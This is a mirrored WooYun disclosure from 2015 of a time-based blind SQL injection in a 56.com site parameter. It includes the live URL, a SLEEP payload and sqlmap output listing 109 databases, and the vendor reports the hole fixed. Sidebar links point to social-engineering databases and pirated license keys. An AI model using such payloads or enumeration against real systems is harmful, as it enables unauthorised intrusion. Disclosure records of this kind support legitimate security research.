56网某站站点SQL注入漏洞109个库
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0127431
漏洞标题:56网某站站点SQL注入漏洞109个库
相关厂商:56.com
漏洞作者:紫霞仙子
提交时间:2015-07-17 19:08
公开时间:2015-08-31 19:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
Tags标签:
漏洞详情
披露状态:
2015-07-17: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开
简要描述:
#Nowall#
详细说明:
1 2 | dv.56.com/hongren/?do=AjaxAdsData&order=11&pn=1&ps=12&type=12参数order<br> sqlmap没跑出来1=1盲注,就不写payload了 |
漏洞证明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 | ---<br> Parameter: order (GET)<br> Type: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind<br> Payload: do=AjaxAdsData&order=11 AND SLEEP(5)&pn=1&ps=12&type=12<br> ---<br>back-end DBMS: MySQL 5.0.12current user: '[email protected]%'available databases [109]:<br> [*] `56youth`<br> [*] `ask and answer`<br> [*] `hd`caihong_2011`<br> [*] alan<br> [*] ayumi<br> [*] bak_lyhiving<br> [*] btws<br> [*] caihong<br> [*] caihong_60plus<br> [*] caihong_arborday<br> [*] caihong_gongyi<br> [*] channel<br> [*] channel_huodong_2012<br> [*] coco<br> [*] daxiaoyifang<br> [*] disney<br> [*] djyx<br> [*] dvspy<br> [*] end_year_2012<br> [*] endyear2013<br> [*] fcwr2011<br> [*] fun_top<br> [*] games2009<br> [*] girl09<br> [*] guanwang_ayu<br> [*] guanwang_boa<br> [*] guanwang_chris<br> [*] guanwang_david<br> [*] gz2010<br> [*] hd_funny2012<br> [*] hd_gz2010<br> [*] hd_gz2010_photo<br> [*] hd_ndshipin<br> [*] hd_wahaha<br> [*] hd_xzb<br> [*] hd_yulerili_2011<br> [*] heishehui<br> [*] hitea<br> [*] hsm<br> [*] hubei<br> [*] huodong_2012_biye<br> [*] huodong_2012_dreamlist<br> [*] huodong_361<br> [*] huodong_60years<br> [*] huodong_60years_hgh<br> [*] huodong_60years_tv<br> [*] huodong_asia<br> [*] huodong_asia_old<br> [*] huodong_baby_cartoon<br> [*] huodong_baby_cartoon_2010<br> [*] huodong_baby_fengmian<br> [*] huodong_brand<br> [*] huodong_byd<br> [*] huodong_crazysurvival<br> [*] huodong_dlhc<br> [*] huodong_hongren<br> [*] huodong_interview<br> [*] huodong_jiehun<br> [*] huodong_missinter<br> [*] huodong_oscar<br> [*] huodong_paike<br> [*] huodong_qmjs<br> [*] huodong_roc<br> [*] huodong_school<br> [*] huodong_school_visionyouth<br> [*] huodong_szy_2011<br> [*] huodong_tybros<br> [*] huodong_tydr<br> [*] huodong_xgdd<br> [*] huodong_ycsyl<br> [*] huodong_ycsyl_syl2012<br> [*] huodong_zbc<br> [*] huodong_zgzqy_2013<br> [*] huodong_zjh<br> [*] information_schema<br> [*] jiemu<br> [*] melon_wp<br> [*] mothersday<br> [*] music_best<br> [*] mxyh<br> [*] mysql<br> [*] mystyle<br> [*] new_mm<br> [*] new_spec_sys<br> [*] olympic_2012<br> [*] paike<br> [*] performance_schema<br> [*] shanliang<br> [*] she<br> [*] special<br> [*] super<br> [*] tb2014<br> [*] tellstory<br> [*] test<br> [*] topic<br> [*] topmusic<br> [*] uaction_video<br> [*] weekly<br> [*] world_cup_2010<br> [*] worldcup_game<br> [*] xing<br> [*] xy<br> [*] ycsyl2014<br> [*] yeah<br> [*] yyj<br> [*] zhibo<br> [*] zyhl |
修复方案:
fix
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-07-1719:25
厂商回复:
已修复
最新状态:
2015-08-31:感谢提醒
评价
- 2010-01-01 00:00 null_z 白帽子 | Rank:879 漏洞数:75)
首页上洞都是你的,仙子要冲榜~~~
2010-01-01 00:00 紫霞仙子 白帽子 | Rank:885 漏洞数:70)@null_z 今天峰会啊!
2010-01-01 00:00 JGHOOluwa 白帽子 | Rank:5 漏洞数:1)@紫霞仙子 仙子收徒不~~
2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)发现你要么中ajax,要么api啊
2010-01-01 00:00 紫霞仙子 白帽子 | Rank:885 漏洞数:70)@BeenQuiver 悄悄的
原文连接:56网某站站点SQL注入漏洞109个库 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 谷歌识图,以图搜图
- 社工库源码大全(持续更新)
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 怎么用图片搜索番号?
- 9部有史以来最好的黑客电影
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:
体验盒子扫码分享
打赏零钱
